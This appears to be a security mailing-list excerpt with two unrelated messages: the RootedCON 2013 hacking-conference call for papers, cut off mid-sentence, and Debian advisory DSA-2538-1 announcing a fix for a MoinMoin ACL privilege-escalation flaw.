-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello all, Here you've attached all the necessary information for any potential speakers willing to have a talk at Rooted CON 2013. Kind regards to all and thanks in advance __ _ _ ___ _ _ / / _ \ ___ ___ | |_ ___ __| |/ ___/ _ \| \ | | / /| |_) / _ \ / _ \| __/ _ \/ _` | | | | | | \| | / / | _ (_) | (_) | || __/ (_| | |__| |_| | |\ | /_/ |_| \_\___/ \___/ \__\___|\__,_|\\___/|_| \_| RootedCON 2013 - 'Call for Papers' PLEASE, READ CAREFULLY ALL THE DETAILS IN THIS DOCUMENT. - -=] About RootedCON RootedCON is a security congress that will take place between March 7 to 9, 2013 in Madrid (Spain). With an estimated capacity of 670 people, is one of the largest specialized conferences ever undertaken in the country and one of the largest in Europe, with profiles of attendees ranging from students, state forces, through market professionals in IT security or simply technology enthusiasts. - -=] Types of talks Two type of talks can be accepted: - - Fast talks: 20 minutes. - - Standard talks: 50 minutes. There will be a limited number of each of the types and may even adapt the calendar for an interesting talk extends beyond 20 minutes or, for specific needs, reducing a 50 minutes one. - -=] Topics Any relevant topic associated with the concept of Hacking, for example, and not being these the only topics that interest us: - - Hacking, cracking, phreaking, virii, WiFi, VoIP, GSM... - - Critical Infrastructure Security, SCADA environments... - - Hardware Hacking, Jtag, SWJ, Dap, ... - - Console and gaming hacking. - - Mobile terminals: android, iOS, Windows mobile, maemo,... - - Reverse engineering, debugging, hooking, fuzzing, exploiting,... - - Innovative tools and techniques both for defense and attack. - - APT, botnets and malware. - - (In)security cloud, virtual environments,... - - Cryptographical techniques, steganography, covert channels,... - - Forensics and antiforensics. - - Networking, level2 and level3,... - - Very original talks like the kind of audience we have... In the last edition, there were popular talks related to Hardware Hacking, modificating the behavior of robots, specialized hardware, or even devices creation. Related Keywords: Drones, Arduino, *copters, Roomba, alarms, Jtag, cameras ... For this edition, we are especially interested in 0days vulnerabilities and all kinds of security problems in whatever critical infrastructures or platforms. - -=] Papers submission procedure We only accept talks submissions through the online form which has been prepared for this purpose: https://www.rootedcon.es/cfp2013-en/(english) https://www.rootedcon.es/cfp2013-es/(spanish) Any other submission method will not be considered as official and will not be evaluated by the selection team. - -=] Schedule and milestones 05 Sep 2012 - Launch of Call for papers 14 Dic 2012 - Call For Papers closing Dic 2012- Get in touch and interviews with the speakers for final confirmation. Jan 2013- Publication of speakers schedule. *4 Feb 2012 - Speakers materials submission to Rooted* 7, 8 y 9 Mar 2013 - /RootedCON2013 - -=] Benefits and privileges as speaker Each speaker will receive the following benefits and privileges: - - A dinner with the rest of the speakers, RootedLabs teachers and RootedCON crew. - - Accommodation (costs assumed by the organization) - - Travel (costs assumed by the organization) - - Full access to the whole congress - - Free drinks at the party ;) - - Management of potential job opportunities. - - A surprise in gratitude for participation. - -=] Duties and responsibilities of speakers All speakers presenting at RootedCON 2013 must: a) Confirm that the presented paper is technical and accompanied by a proof of concept (PoC). b) Send the material of the talk prior to the dates of the Congress. Within the submission of material is important to include details about the demos that will be performed. c) Develop the slides according to the RootedCON 2013 official templates. d) Explicitly accept that the materials presented, as well as video and audio recordings made shall be published in either mechanisms RootedCON content management or other media in the future. RootedCON *won't censor* any of the materials, recordings, media publication or whatever mechanisms by which are made accessible to the public and the congress attendees. - -=] Sponsors and Partners RootedCON is always looking for quality sponsors and partners. If you have a proposal or you think your company may be interested, please contact us at: sponsors-AT-rootedcon.es IMPORTANT: Due to the highly technical subject of the congress, and the preferences shown by attendees in multiple surveys, we encourage potential sponsors who intend to have a slot as speaker attempting
[SECURITY] [DSA 2538-1] moin security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2538-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert September 05, 2012 http://www.debian.org/security/faq - - Package: moin Vulnerability : privilege escalation Problem type : remote Debian-specific: no CVE ID : CVE-2012-4404 It was discovered that Moin, a Python clone of WikiWiki, incorrectly evaluates ACLs when virtual groups are involved. This may allow certain users to have additional permissions (privilege escalation) or lack expected permissions. For the stable distribution (squeeze), this problem has been fixed in version 1.9.3-1+squeeze2. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 1.9.4-8. We recommend that you upgrade your moin packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAlBHnSAACgkQYy49rUbZzlpyrgCfWVw07a+DGjcWlbK09RF+Lw4Y JAcAn1AdHlyFq+OfCLZ4gQhfBXcqxpw/ =+e4Z -END PGP SIGNATURE-
